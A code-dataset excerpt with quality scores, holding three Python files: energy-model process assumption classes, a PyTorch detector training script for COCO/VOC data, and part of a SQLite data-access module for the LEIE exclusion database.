code stringlengths 2k 1.04M | repo_path stringlengths 5 517 | parsed_code stringlengths 0 1.04M | quality_prob float64 0.02 0.95 | learning_prob float64 0.02 0.93 |
|---|---|---|---|---|
from numpy import zeros
#------------ technology/process -------------
# basic process definition at country level
class ProcessAssump:
""" process assumption class """
# this class for creating objects at both country and zone level
# country level is used for general assumption initiation
# zone level inherit the data from country assumptions
# renewable options is split by CF class
# the zonal modelling results are kept in this class
# be aware of the same sProcessName of renewables with different CF class
def __init__(self, **kwargs):
self.sProcessName = str( kwargs["ProcessName"] )
self.sProcessType = str( kwargs["ProcessType"] )
self.sProcessFullName = str( kwargs["ProcessFullName"] )
self.sFuel = str( kwargs["Fuel"] )
self.sOperationMode = str( kwargs["OperationMode"] ) # Dispatch, NonDispatch, Storage
self.bCCS = int( kwargs["CCS"] )
self.bAS_T1 = int( kwargs["AS_T1"] )
self.bAS_T2 = int( kwargs["AS_T2"] )
self.bAS_T3 = int( kwargs["AS_T3"] )
# technical assumption (country level)
self.iUnitCapacity = 0 # MW
self.fGrossEff_YS = zeros( int(kwargs["iYS"]) ) # 0-1
self.fMinLoad_YS = zeros( int(kwargs["iYS"]) ) # 0-1
self.fRampRate_YS = zeros( int(kwargs["iYS"]) ) # %P/Min
self.fEquAvailFactor_YS = zeros( int(kwargs["iYS"]) ) # 0-1 # CF already accout for availability for renewables
self.fAuxiliaryCon_YS = zeros( int(kwargs["iYS"]) ) # 0-1 # own use
self.fCaptureRate_YS = zeros( int(kwargs["iYS"]) ) # 0-1, for CCS
self.fDuration_YS = zeros( int(kwargs["iYS"]) ) # hours, for storage
# cost assumption (country level)
self.fCAPEX_YS = zeros( int(kwargs["iYS"]) ) # USD/kW
self.fOPEX_YS = zeros( int(kwargs["iYS"]) ) # USD/kW
self.fVarOPEX_YS = zeros( int(kwargs["iYS"]) ) # USD/kWh
self.fLifetime = 0 # Year
self.fVarOM = 0 # USD/kWh
self.fDiscount = 0.05 # 0-1
self.fAnnualCapex = zeros( int(kwargs["iYS"]) ) # (M.USD / yr.MW)
self.fAnnualFixedCost = zeros( int(kwargs["iYS"]) ) # (M.USD / yr.MW)
# fixed new build of dispatchable units (country level)
self.dicProcDispFixedNewBuild = {} # MW
### additional parameters (only for on renewable techs, and storage)
# renewable zonal capacity and limit by class
self.iCFClass = 0
self.fREDevLimit = 0 # MW, overall capacity develoment limit
self.fREExistCap = 0 # MW, capacity of existing units
self.fPVLandLimit = 0 # km2, available area for all solar tech
self.fRECF_TS = [] # 0-1, CF for dispatch operatoin
self.fRECF_CEP = [] # 0-1, CF for capacity expansion
self.fRECF_CEP_RT = [] # 0-1, Cf for testing extreme cases in CE, update in each period
self.fRECF_8760 = [] # 0-1, original annual hourly CF data
self.fBaseDispCF_288 = None # 0-1, original annual hourly CF data
#### modelling results
self.dicProcNewBuild_YS = {} # MW
self.dicProcAccCapacity_YS = {} # MW
return
# technical assumption for the process in a zone
class ZoneProcess():
""" zonal process class """
def __init__(self, **kwargs):
self.sCompany = ""
self.iZoneProcAssumIndex = 0
self.sProcessName = str( kwargs["sProcessName"] )
self.sProcessID = str( kwargs["sProcessID"] )
self.sProcessType = ""
self.sFuel = ""
self.sOperationMode = ""
self.bCCS = 0
self.iOperatoinStatus_TS_YS = None # 0:shutsown 1:generating 2:commited
self.iCapacity = 0 # MW
self.fGrossEff = 0 # 0-1
self.fMinLoad = 0 # 0-1
self.fRampRate = 0 # %P/Min
self.fEquAvailFactor = 0 # 0-1
self.fAuxiliaryCon = 0 # 0-1 # own use
self.fCaptureRate = 0 # 0-1
self.fDuration = 0 # hours
self.iCommitTime = 0 # year
self.iDeCommitTime = 0 # year
self.iCFClass = 0
''' ---- derived assumptions ---- '''
# fDeratedCapacity (MW)
# fAnnualCapex (M.USD / yr)
# fAnnualFixedCost (M.USD / yr)
# fvarOMCost (USD/kWh)
# iCFClass CF tranche class for renewables
# fASMax_T1 # MW, max capacity for first tier ancillary service
# fASMax_T2 # MW, max capacity for second tier ancillary service
# fASMax_T3 # MW, max capacity for third tier ancillary service
return | scripts/cls_process.py |
from numpy import zeros
#------------ technology/process -------------
# basic process definition at country level
class ProcessAssump:
""" process assumption class """
# this class for creating objects at both country and zone level
# country level is used for general assumption initiation
# zone level inherit the data from country assumptions
# renewable options is split by CF class
# the zonal modelling results are kept in this class
# be aware of the same sProcessName of renewables with different CF class
def __init__(self, **kwargs):
self.sProcessName = str( kwargs["ProcessName"] )
self.sProcessType = str( kwargs["ProcessType"] )
self.sProcessFullName = str( kwargs["ProcessFullName"] )
self.sFuel = str( kwargs["Fuel"] )
self.sOperationMode = str( kwargs["OperationMode"] ) # Dispatch, NonDispatch, Storage
self.bCCS = int( kwargs["CCS"] )
self.bAS_T1 = int( kwargs["AS_T1"] )
self.bAS_T2 = int( kwargs["AS_T2"] )
self.bAS_T3 = int( kwargs["AS_T3"] )
# technical assumption (country level)
self.iUnitCapacity = 0 # MW
self.fGrossEff_YS = zeros( int(kwargs["iYS"]) ) # 0-1
self.fMinLoad_YS = zeros( int(kwargs["iYS"]) ) # 0-1
self.fRampRate_YS = zeros( int(kwargs["iYS"]) ) # %P/Min
self.fEquAvailFactor_YS = zeros( int(kwargs["iYS"]) ) # 0-1 # CF already accout for availability for renewables
self.fAuxiliaryCon_YS = zeros( int(kwargs["iYS"]) ) # 0-1 # own use
self.fCaptureRate_YS = zeros( int(kwargs["iYS"]) ) # 0-1, for CCS
self.fDuration_YS = zeros( int(kwargs["iYS"]) ) # hours, for storage
# cost assumption (country level)
self.fCAPEX_YS = zeros( int(kwargs["iYS"]) ) # USD/kW
self.fOPEX_YS = zeros( int(kwargs["iYS"]) ) # USD/kW
self.fVarOPEX_YS = zeros( int(kwargs["iYS"]) ) # USD/kWh
self.fLifetime = 0 # Year
self.fVarOM = 0 # USD/kWh
self.fDiscount = 0.05 # 0-1
self.fAnnualCapex = zeros( int(kwargs["iYS"]) ) # (M.USD / yr.MW)
self.fAnnualFixedCost = zeros( int(kwargs["iYS"]) ) # (M.USD / yr.MW)
# fixed new build of dispatchable units (country level)
self.dicProcDispFixedNewBuild = {} # MW
### additional parameters (only for on renewable techs, and storage)
# renewable zonal capacity and limit by class
self.iCFClass = 0
self.fREDevLimit = 0 # MW, overall capacity develoment limit
self.fREExistCap = 0 # MW, capacity of existing units
self.fPVLandLimit = 0 # km2, available area for all solar tech
self.fRECF_TS = [] # 0-1, CF for dispatch operatoin
self.fRECF_CEP = [] # 0-1, CF for capacity expansion
self.fRECF_CEP_RT = [] # 0-1, Cf for testing extreme cases in CE, update in each period
self.fRECF_8760 = [] # 0-1, original annual hourly CF data
self.fBaseDispCF_288 = None # 0-1, original annual hourly CF data
#### modelling results
self.dicProcNewBuild_YS = {} # MW
self.dicProcAccCapacity_YS = {} # MW
return
# technical assumption for the process in a zone
class ZoneProcess():
""" zonal process class """
def __init__(self, **kwargs):
self.sCompany = ""
self.iZoneProcAssumIndex = 0
self.sProcessName = str( kwargs["sProcessName"] )
self.sProcessID = str( kwargs["sProcessID"] )
self.sProcessType = ""
self.sFuel = ""
self.sOperationMode = ""
self.bCCS = 0
self.iOperatoinStatus_TS_YS = None # 0:shutsown 1:generating 2:commited
self.iCapacity = 0 # MW
self.fGrossEff = 0 # 0-1
self.fMinLoad = 0 # 0-1
self.fRampRate = 0 # %P/Min
self.fEquAvailFactor = 0 # 0-1
self.fAuxiliaryCon = 0 # 0-1 # own use
self.fCaptureRate = 0 # 0-1
self.fDuration = 0 # hours
self.iCommitTime = 0 # year
self.iDeCommitTime = 0 # year
self.iCFClass = 0
''' ---- derived assumptions ---- '''
# fDeratedCapacity (MW)
# fAnnualCapex (M.USD / yr)
# fAnnualFixedCost (M.USD / yr)
# fvarOMCost (USD/kWh)
# iCFClass CF tranche class for renewables
# fASMax_T1 # MW, max capacity for first tier ancillary service
# fASMax_T2 # MW, max capacity for second tier ancillary service
# fASMax_T3 # MW, max capacity for third tier ancillary service
return | 0.573917 | 0.314886 |
import os
import numpy as np
import argparse
import time
import torch
from utils.net_utils import adjust_learning_rate, save_checkpoint, clip_gradient, calc_grad_norm
from utils.box_utils import sample_proposals
from model.dc_vgg16 import DC_VGG16_DET, DC_VGG16_CLS
from datasets.tdet_dataset import TDETDataset
from matplotlib import pyplot as plt
import torch.nn.functional as F
import math
def parse_args():
parser = argparse.ArgumentParser(description='Train')
parser.add_argument('--net', default='DC_VGG16_DET', type=str)
parser.add_argument('--start_iter', help='starting iteration', default=1, type=int)
parser.add_argument('--max_iter', help='number of iterations', default=70000, type=int)
parser.add_argument('--disp_interval', help='number of iterations to display loss', default=1000, type=int)
parser.add_argument('--save_interval', dest='save_interval', help='number of iterations to save', default=10000, type=int)
parser.add_argument('--save_dir', help='directory to save models', default="../repo/tdet")
parser.add_argument('--data_dir', help='directory to load data', default='../data', type=str)
parser.add_argument('--pooling_method', help='roi_pooling or roi_align', default='roi_pooling', type=str)
parser.add_argument('--prop_method', help='ss, eb, or mcg', default='eb', type=str)
parser.add_argument('--prop_min_scale', help='minimum proposal box size', default=20, type=int)
parser.add_argument('--num_prop', help='maximum number of proposals to use for training', default=2000, type=int)
parser.add_argument('--bs', help='training batch size', default=128, type=int)
parser.add_argument('--pos_ratio', help='ratio of positive roi', default=0.25, type=float)
parser.add_argument('--lr', help='starting learning rate', default=0.001, type=float)
parser.add_argument('--s', dest='session', help='training session', default=0, type=int)
parser.add_argument('--seed', help='random sed', default=1, type=int)
parser.add_argument('--target_only', action='store_true')
parser.add_argument('--pretrained_base_path', type=str)
args = parser.parse_args()
return args
def draw_box(boxes, col=None):
for j, (xmin, ymin, xmax, ymax) in enumerate(boxes):
if col is None:
c = np.random.rand(3)
else:
c = col
plt.hlines(ymin, xmin, xmax, colors=c, lw=2)
plt.hlines(ymax, xmin, xmax, colors=c, lw=2)
plt.vlines(xmin, ymin, ymax, colors=c, lw=2)
plt.vlines(xmax, ymin, ymax, colors=c, lw=2)
def validate(model, val_dataset, args, device):
model.eval()
tot_loss = 0
for step in range(len(val_dataset)):
batch = val_dataset.get_data(step, h_flip=False, target_im_size=688)
im_data = batch['im_data'].unsqueeze(0).to(device)
proposals = batch['proposals']
gt_boxes = batch['gt_boxes']
gt_labels = batch['gt_labels']
pos_cls = [i for i in range(20) if i in gt_labels]
loss = 0
for cls in np.random.choice(pos_cls, 2):
indices = np.where(gt_labels.numpy() == cls)[0]
here_gt_boxes = gt_boxes[indices]
here_proposals, here_labels, _, pos_cnt, neg_cnt = sample_proposals(here_gt_boxes, proposals, args.bs // 2, args.pos_ratio)
here_proposals = here_proposals.to(device)
here_labels = here_labels.to(device)
here_loss = model(im_data, cls, here_proposals, here_labels)
loss = loss + here_loss.item()
loss /= 2
tot_loss += loss
model.train()
print('Validation loss: %.4f' % (tot_loss / len(val_dataset)))
def train():
args = parse_args()
print('Called with args:')
print(args)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if torch.cuda.is_available():
torch.cuda.manual_seed(args.seed)
device = torch.device('cuda')
else:
device = torch.device('cpu')
output_dir = args.save_dir
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if args.target_only:
source_train_dataset = TDETDataset(['voc07_trainval'], args.data_dir, args.prop_method,
num_classes=20, prop_min_scale=args.prop_min_scale, prop_topk=args.num_prop)
else:
source_train_dataset = TDETDataset(['coco60_train2014', 'coco60_val2014'], args.data_dir, args.prop_method,
num_classes=60, prop_min_scale=args.prop_min_scale, prop_topk=args.num_prop)
target_val_dataset = TDETDataset(['voc07_test'], args.data_dir, args.prop_method,
num_classes=20, prop_min_scale=args.prop_min_scale, prop_topk=args.num_prop)
lr = args.lr
if args.net == 'DC_VGG16_DET':
base_model = DC_VGG16_CLS(None, 20 if args.target_only else 80, 3, 4)
checkpoint = torch.load(args.pretrained_base_path)
base_model.load_state_dict(checkpoint['model'])
del checkpoint
model = DC_VGG16_DET(base_model, args.pooling_method)
optimizer = model.get_optimizer(args.lr)
log_file_name = os.path.join(output_dir, 'log_{}_{}.txt'.format(args.net, args.session))
log_file = open(log_file_name, 'w')
log_file.write(str(args))
log_file.write('\n')
model.to(device)
model.train()
source_loss_sum = 0
source_pos_prop_sum = 0
source_neg_prop_sum = 0
start = time.time()
optimizer.zero_grad()
for step in range(args.start_iter, args.max_iter + 1):
if step % len(source_train_dataset) == 1:
source_rand_perm = np.random.permutation(len(source_train_dataset))
source_index = source_rand_perm[step % len(source_train_dataset)]
source_batch = source_train_dataset.get_data(source_index, h_flip=np.random.rand() > 0.5, target_im_size=np.random.choice([480, 576, 688, 864, 1200]))
source_im_data = source_batch['im_data'].unsqueeze(0).to(device)
source_proposals = source_batch['proposals']
source_gt_boxes = source_batch['gt_boxes']
if args.target_only:
source_gt_labels = source_batch['gt_labels']
else:
source_gt_labels = source_batch['gt_labels'] + 20
source_pos_cls = [i for i in range(80) if i in source_gt_labels]
source_loss = 0
for cls in np.random.choice(source_pos_cls, 2):
indices = np.where(source_gt_labels.numpy() == cls)[0]
here_gt_boxes = source_gt_boxes[indices]
here_proposals, here_labels, _, pos_cnt, neg_cnt = sample_proposals(here_gt_boxes, source_proposals, args.bs // 2, args.pos_ratio)
# plt.imshow(source_batch['raw_img'])
# draw_box(here_proposals[:pos_cnt] / source_batch['im_scale'], 'black')
# draw_box(here_proposals[pos_cnt:] / source_batch['im_scale'], 'yellow')
# plt.show()
here_proposals = here_proposals.to(device)
here_labels = here_labels.to(device)
here_loss = model(source_im_data, cls, here_proposals, here_labels)
source_loss = source_loss + here_loss
source_pos_prop_sum += pos_cnt
source_neg_prop_sum += neg_cnt
source_loss = source_loss / 2
source_loss_sum += source_loss.item()
source_loss.backward()
clip_gradient(model, 10.0)
optimizer.step()
optimizer.zero_grad()
if step % args.disp_interval == 0:
end = time.time()
source_loss_sum /= args.disp_interval
source_pos_prop_sum /= args.disp_interval
source_neg_prop_sum /= args.disp_interval
log_message = "[%s][session %d][iter %4d] loss: %.4f, pos_prop: %.1f, neg_prop: %.1f, lr: %.2e, time: %.1f" % \
(args.net, args.session, step, source_loss_sum, source_pos_prop_sum, source_neg_prop_sum, lr, end - start)
print(log_message)
log_file.write(log_message + '\n')
log_file.flush()
source_loss_sum = 0
source_pos_prop_sum = 0
source_neg_prop_sum = 0
start = time.time()
if step in (args.max_iter * 4 // 7, args.max_iter * 6 // 7):
adjust_learning_rate(optimizer, 0.1)
lr *= 0.1
if step % args.save_interval == 0 or step == args.max_iter:
validate(model, target_val_dataset, args, device)
save_name = os.path.join(output_dir, '{}_{}_{}.pth'.format(args.net, args.session, step))
checkpoint = dict()
checkpoint['net'] = args.net
checkpoint['session'] = args.session
checkpoint['pooling_method'] = args.pooling_method
checkpoint['iterations'] = step
checkpoint['model'] = model.state_dict()
save_checkpoint(checkpoint, save_name)
print('save model: {}'.format(save_name))
log_file.close()
if __name__ == '__main__':
train() | train_dc_det.py | import os
import numpy as np
import argparse
import time
import torch
from utils.net_utils import adjust_learning_rate, save_checkpoint, clip_gradient, calc_grad_norm
from utils.box_utils import sample_proposals
from model.dc_vgg16 import DC_VGG16_DET, DC_VGG16_CLS
from datasets.tdet_dataset import TDETDataset
from matplotlib import pyplot as plt
import torch.nn.functional as F
import math
def parse_args():
parser = argparse.ArgumentParser(description='Train')
parser.add_argument('--net', default='DC_VGG16_DET', type=str)
parser.add_argument('--start_iter', help='starting iteration', default=1, type=int)
parser.add_argument('--max_iter', help='number of iterations', default=70000, type=int)
parser.add_argument('--disp_interval', help='number of iterations to display loss', default=1000, type=int)
parser.add_argument('--save_interval', dest='save_interval', help='number of iterations to save', default=10000, type=int)
parser.add_argument('--save_dir', help='directory to save models', default="../repo/tdet")
parser.add_argument('--data_dir', help='directory to load data', default='../data', type=str)
parser.add_argument('--pooling_method', help='roi_pooling or roi_align', default='roi_pooling', type=str)
parser.add_argument('--prop_method', help='ss, eb, or mcg', default='eb', type=str)
parser.add_argument('--prop_min_scale', help='minimum proposal box size', default=20, type=int)
parser.add_argument('--num_prop', help='maximum number of proposals to use for training', default=2000, type=int)
parser.add_argument('--bs', help='training batch size', default=128, type=int)
parser.add_argument('--pos_ratio', help='ratio of positive roi', default=0.25, type=float)
parser.add_argument('--lr', help='starting learning rate', default=0.001, type=float)
parser.add_argument('--s', dest='session', help='training session', default=0, type=int)
parser.add_argument('--seed', help='random sed', default=1, type=int)
parser.add_argument('--target_only', action='store_true')
parser.add_argument('--pretrained_base_path', type=str)
args = parser.parse_args()
return args
def draw_box(boxes, col=None):
for j, (xmin, ymin, xmax, ymax) in enumerate(boxes):
if col is None:
c = np.random.rand(3)
else:
c = col
plt.hlines(ymin, xmin, xmax, colors=c, lw=2)
plt.hlines(ymax, xmin, xmax, colors=c, lw=2)
plt.vlines(xmin, ymin, ymax, colors=c, lw=2)
plt.vlines(xmax, ymin, ymax, colors=c, lw=2)
def validate(model, val_dataset, args, device):
model.eval()
tot_loss = 0
for step in range(len(val_dataset)):
batch = val_dataset.get_data(step, h_flip=False, target_im_size=688)
im_data = batch['im_data'].unsqueeze(0).to(device)
proposals = batch['proposals']
gt_boxes = batch['gt_boxes']
gt_labels = batch['gt_labels']
pos_cls = [i for i in range(20) if i in gt_labels]
loss = 0
for cls in np.random.choice(pos_cls, 2):
indices = np.where(gt_labels.numpy() == cls)[0]
here_gt_boxes = gt_boxes[indices]
here_proposals, here_labels, _, pos_cnt, neg_cnt = sample_proposals(here_gt_boxes, proposals, args.bs // 2, args.pos_ratio)
here_proposals = here_proposals.to(device)
here_labels = here_labels.to(device)
here_loss = model(im_data, cls, here_proposals, here_labels)
loss = loss + here_loss.item()
loss /= 2
tot_loss += loss
model.train()
print('Validation loss: %.4f' % (tot_loss / len(val_dataset)))
def train():
args = parse_args()
print('Called with args:')
print(args)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if torch.cuda.is_available():
torch.cuda.manual_seed(args.seed)
device = torch.device('cuda')
else:
device = torch.device('cpu')
output_dir = args.save_dir
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if args.target_only:
source_train_dataset = TDETDataset(['voc07_trainval'], args.data_dir, args.prop_method,
num_classes=20, prop_min_scale=args.prop_min_scale, prop_topk=args.num_prop)
else:
source_train_dataset = TDETDataset(['coco60_train2014', 'coco60_val2014'], args.data_dir, args.prop_method,
num_classes=60, prop_min_scale=args.prop_min_scale, prop_topk=args.num_prop)
target_val_dataset = TDETDataset(['voc07_test'], args.data_dir, args.prop_method,
num_classes=20, prop_min_scale=args.prop_min_scale, prop_topk=args.num_prop)
lr = args.lr
if args.net == 'DC_VGG16_DET':
base_model = DC_VGG16_CLS(None, 20 if args.target_only else 80, 3, 4)
checkpoint = torch.load(args.pretrained_base_path)
base_model.load_state_dict(checkpoint['model'])
del checkpoint
model = DC_VGG16_DET(base_model, args.pooling_method)
optimizer = model.get_optimizer(args.lr)
log_file_name = os.path.join(output_dir, 'log_{}_{}.txt'.format(args.net, args.session))
log_file = open(log_file_name, 'w')
log_file.write(str(args))
log_file.write('\n')
model.to(device)
model.train()
source_loss_sum = 0
source_pos_prop_sum = 0
source_neg_prop_sum = 0
start = time.time()
optimizer.zero_grad()
for step in range(args.start_iter, args.max_iter + 1):
if step % len(source_train_dataset) == 1:
source_rand_perm = np.random.permutation(len(source_train_dataset))
source_index = source_rand_perm[step % len(source_train_dataset)]
source_batch = source_train_dataset.get_data(source_index, h_flip=np.random.rand() > 0.5, target_im_size=np.random.choice([480, 576, 688, 864, 1200]))
source_im_data = source_batch['im_data'].unsqueeze(0).to(device)
source_proposals = source_batch['proposals']
source_gt_boxes = source_batch['gt_boxes']
if args.target_only:
source_gt_labels = source_batch['gt_labels']
else:
source_gt_labels = source_batch['gt_labels'] + 20
source_pos_cls = [i for i in range(80) if i in source_gt_labels]
source_loss = 0
for cls in np.random.choice(source_pos_cls, 2):
indices = np.where(source_gt_labels.numpy() == cls)[0]
here_gt_boxes = source_gt_boxes[indices]
here_proposals, here_labels, _, pos_cnt, neg_cnt = sample_proposals(here_gt_boxes, source_proposals, args.bs // 2, args.pos_ratio)
# plt.imshow(source_batch['raw_img'])
# draw_box(here_proposals[:pos_cnt] / source_batch['im_scale'], 'black')
# draw_box(here_proposals[pos_cnt:] / source_batch['im_scale'], 'yellow')
# plt.show()
here_proposals = here_proposals.to(device)
here_labels = here_labels.to(device)
here_loss = model(source_im_data, cls, here_proposals, here_labels)
source_loss = source_loss + here_loss
source_pos_prop_sum += pos_cnt
source_neg_prop_sum += neg_cnt
source_loss = source_loss / 2
source_loss_sum += source_loss.item()
source_loss.backward()
clip_gradient(model, 10.0)
optimizer.step()
optimizer.zero_grad()
if step % args.disp_interval == 0:
end = time.time()
source_loss_sum /= args.disp_interval
source_pos_prop_sum /= args.disp_interval
source_neg_prop_sum /= args.disp_interval
log_message = "[%s][session %d][iter %4d] loss: %.4f, pos_prop: %.1f, neg_prop: %.1f, lr: %.2e, time: %.1f" % \
(args.net, args.session, step, source_loss_sum, source_pos_prop_sum, source_neg_prop_sum, lr, end - start)
print(log_message)
log_file.write(log_message + '\n')
log_file.flush()
source_loss_sum = 0
source_pos_prop_sum = 0
source_neg_prop_sum = 0
start = time.time()
if step in (args.max_iter * 4 // 7, args.max_iter * 6 // 7):
adjust_learning_rate(optimizer, 0.1)
lr *= 0.1
if step % args.save_interval == 0 or step == args.max_iter:
validate(model, target_val_dataset, args, device)
save_name = os.path.join(output_dir, '{}_{}_{}.pth'.format(args.net, args.session, step))
checkpoint = dict()
checkpoint['net'] = args.net
checkpoint['session'] = args.session
checkpoint['pooling_method'] = args.pooling_method
checkpoint['iterations'] = step
checkpoint['model'] = model.state_dict()
save_checkpoint(checkpoint, save_name)
print('save model: {}'.format(save_name))
log_file.close()
if __name__ == '__main__':
train() | 0.463201 | 0.141608 |
import datetime
import dateutil.parser
import os
from path import cd
import simplejson as json
import sqlite3
import subprocess
import sys
import yaml
import log
warn, info, debug, fatal = log.reporters()
class UnsupportedDBType(Exception):
pass
class DBNotFound(Exception):
pass
class DBConn(object):
def __init__(self, db_name="development", db_conf_file="", connect=True):
"""Open a database connection, creating db if needed, and generally
get ready to store stuff.
DB_NAME is the name of the database to target from dbconf.yml.
If DB_CONF_FILE isn't specified, we use a stock one of defaults.
Goose migrations used dbconf.yml files, so for convenience, we
just read any needed data from that file.
If CONNECT is true, we open a db connection.
"""
self.db_name = db_name
if os.path.exists(db_conf_file):
# slurp dbconf.yml
with open(db_conf_file) as INF:
self.db_conf = yaml.load(INF)[db_name]
else:
info("dbconf.yml not found, using default config values (db will be leie.sqlite3)")
self.db_name = "development"
self.db_conf = yaml.load("development:\n driver: sqlite3\n open: leie.sqlite3\n")[self.db_name]
# If we're not opening a connection, we're done
if not connect:
return
# open and hang on to a db connection for later use
if self.db_conf['driver'] == 'sqlite3':
self.conn = sqlite3.connect(self.db_conf['open'])
else:
raise UnsupportedDBType("We don't support databases of type %s" % self.db_conf['driver'])
def close(self):
"""Commit and close the db connection"""
self.conn.commit()
self.conn.close()
def table_len(self, table):
"""Return the number of total rows in the TABLE"""
c = self.conn.cursor()
return (c.execute("SELECT Count(*) FROM %s" % table).fetchone()[0])
def row_to_dict(self, row, field=None, description=None):
"""
FIELD is a list or tuple of field names
DESCRIPTION is the results of cursor.description from sqlite
Either FIELD or DESCRIPTION must be present, but not both.
ROW is a tuple of values
Returns a dict with the keys taken from FIELD and the values taken from ROW.
"""
assert field or description
assert not (field and description)
if description:
field = [c[0] for c in description]
field = ['id' if f == 'rowid' else f for f in field]
return dict(zip(field, row))
class SQL(DBConn):
"""All the sql and goose stuff goes in this class.
We generate the SQL here becuase in the future I think we might want some
smart/scripted way to manage sql for different DB types."""
def down(self, migration):
"""Returns schema sql for migrating the db down
Specify a MIGRATION, the first being 0 on up to the latest.
If you specify a migration beyond our total, we return
None.
"""
if migration == 0:
return """
DROP TABLE exclusion;
DROP TABLE reinstatement;
"""
if migration == 1:
return "DROP TABLE log;"
def goose(self):
"""Returns a dict of goose migrations. The keys are filenames and the
values are the contents of the goose files.
We only have one migration so far, so this is pretty easy.
"""
fnames = ["20170515130501_initial_create.sql"
,"20170606100001_create_log.sql"
]
migrations = {}
for a in range(len(fnames)):
migrations[fnames[a]] = "-- +goose Up\n" + self.up(a) + "\n-- +goose Down\n" + self.down(a) + "\n"
return migrations
def goose_write(self, dirname=None):
"""Writes any needed migration files to the migrations directory
specified by DIRNAME. Leave DIRNAME as None to just use
./db as the migrations directory.
Returns list of paths to created files.
"""
if not dirname:
dirname = os.path.join(os.path.dirname(__file__), "db")
dirname = os.path.join(dirname, self.db_conf['driver'])
os.makedirs(dirname, exist_ok=True)
created = []
for fname, migration in self.goose().items():
fname = os.path.join(dirname, fname)
if os.path.exists(fname):
debug("Migration " +fname+" already exists. Overwriting.")
created.append(fname)
info("Writing migration to " + fname)
with open(fname, 'w') as OUTF:
OUTF.write(migration)
return created
def migrate(self):
"""Bring the db schema up to date by running any needed model
migrations."""
debug(self.db_conf)
dirname = os.path.dirname(self.db_conf['open'])
if not dirname:
dirname = os.path.dirname(__file__)
with cd(dirname):
# Make sure the sqlite3 db exists before we try to migrate it
if not os.path.exists(os.path.basename(self.db_conf['open'])):
raise DBNotFound("DB %s doesn't exist, so we can't migrate it." % self.db_conf['open'])
# Goose apparently returns 0 even when it errors, so we
# have to check stderr and react accordingly.
cmd = "goose -dir db/{0} {0} {1} up".format(self.db_conf['driver'], os.path.basename(self.db_conf['open']))
debug("Executing `%s`" % cmd)
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
out, err = p.communicate()
out = out.decode("utf-8")
err = err.decode("utf-8")
if p.returncode != 0:
sys.stderr.write("%s\n%s" % (out, err))
raise subprocess.CalledProcessError(p.returncode, cmd, out+err)
return out
def up(self, migration):
"""Returns schema sql for migrating the db up.
Specify a MIGRATION, the first being 0 on up to the latest.
If you specify a migration beyond our total, we return
None.
"""
# We only handle sqlite for now
if self.db_conf['driver'] != "sqlite3":
raise UnsupportedDBType("We don't have migrations for %s" % self.db_conf['driver'])
if migration == 0:
common_rows = """
lastname text check(lastname is null or length(lastname) <= 20),
firstname text check(firstname is null or length(firstname) <= 15),
midname text check(midname is null or length(midname) <= 15),
busname text check(busname is null or length(busname) <= 30),
general text check(general is null or length(general) <= 20),
specialty text check(specialty is null or length(specialty) <= 20),
upin text check(upin is null or length(upin) <= 6),
npi integer check(npi is null or npi<10000000000),
dob text check(dob is null or length(dob) <= 23),
address text check(address is null or length(address) <= 30),
city text check(city is null or length(city) <= 20),
state text check(state is null or length(state) <= 2),
zip integer check(zip is null or zip < 100000),
excltype text not null check(excltype is null or length(excltype) <= 8),
excldate text not null check(excldate is null or length(excldate) <= 23),
reindate text check(reindate is null or length(reindate) <= 23),
waiverdate text check(waiverdate is null or length(waiverdate) <= 23),
waiverstate text check(waiverstate is null or length(waiverstate) <= 2)
"""
return("CREATE TABLE IF NOT EXISTS exclusion (" + common_rows + ");\n"
+ "CREATE TABLE IF NOT EXISTS reinstatement (" + common_rows + ");\n")
elif migration == 1:
return """
CREATE TABLE IF NOT EXISTS log (
datetime text,
datatype text,
msg text);
"""
else:
return None
class LEIE(SQL):
"""This is a DAO class but not an ORM class. We're modeling the
database, not the data. Maybe that will change, but it works for
now.
"""
def count_exclusions(self):
"""Return number of rows in the exclusion table"""
return self.table_len("exclusion")
def dedupe(self, table):
"""
Remove any duplicate rows from TABLE
"""
# Look for duplicate entries
seen = set()
uniq = []
dup = []
c = self.conn.cursor()
for x in c.execute("SELECT * FROM %s" % table).fetchall():
if x not in seen:
uniq.append(x)
seen.add(x)
else:
dup.append(x)
# We're done if there are no dupes
if not dup:
return
# Uh-oh, better fess up and clean up
warn("Duplicate reinstatements found in %s!" % table)
info("Cleaning duplicate reinstatements from %s" % table)
c.execute("delete from {0} where rowid not in (select max(rowid) from {0} group by {1})".format(
table,
", ".join(self.get_header(table))
))
def dedupe_reinstatements(self):
"""
Make sure there are no duplicate rows in the reinstatement table.
"""
self.dedupe("reinstatement")
def get_download_datetime(self, fname):
"""Return the logged time of the last download of the file named FNAME
If it's not there, return None"""
c = self.conn.cursor()
all = c.execute("SELECT * FROM log WHERE msg=?", ["Downloaded " + fname]).fetchall()
if not all:
return None
return dateutil.parser.parse(all[-1][0])
def get_exclusions(self, limit=10, page=1, filter={}, form="list"):
"""Return all the rows from the log table up to LIMIT rows
FORM can be 'list' or 'dict'. If 'list', return rows as
lists. If dict, return rows as dicts.
If PAGE is specified, we skip the first (PAGE-1)*LIMIT rows
and return LIMIT rows from there.
"""
assert form in ["list", "dict"]
assert page >= 1
assert limit >= 1
crsr = self.conn.cursor()
# Make strings for the filters to be inserted in to the sql
# query. Also, make a list of arguments for the query.
args = [limit*(page-1)]
query = ["SELECT rowid, * FROM exclusion",
"WHERE rowid NOT IN ( SELECT rowid FROM exclusion ORDER BY excldate DESC LIMIT ?)"
]
for k,v in filter.items():
if v:
query.append("AND %s=?" % k)
args.append(v)
query.append("ORDER BY excldate DESC LIMIT ?")
args.append(limit)
# Return a range of rows
rows = crsr.execute(" ".join(query), args).fetchall()
if form == 'list':
return rows
return [Exclusion(self.row_to_dict(r, description=crsr.description)) for r in rows]
def get_header(self, table):
"""Returns a list of the column names in TABLE"""
c = self.conn.cursor()
return [f[1] for f in c.execute("PRAGMA table_info(%s)" % table).fetchall()]
def get_latest_date(self, table, field):
"""Find and return the latest month and year in the list of actions in
TABLE by looking at dates in FIELD. Return this value as a
string formatted "YYYY-MM-DD".
If there are no rows, return "".
"""
crsr = self.conn.cursor()
d = crsr.execute("SELECT {1} FROM {0} ORDER BY date({1}) DESC Limit 1".format(table, field)).fetchone()
if not d:
return ""
return d[0][:10]
def get_latest_exclusion_date(self):
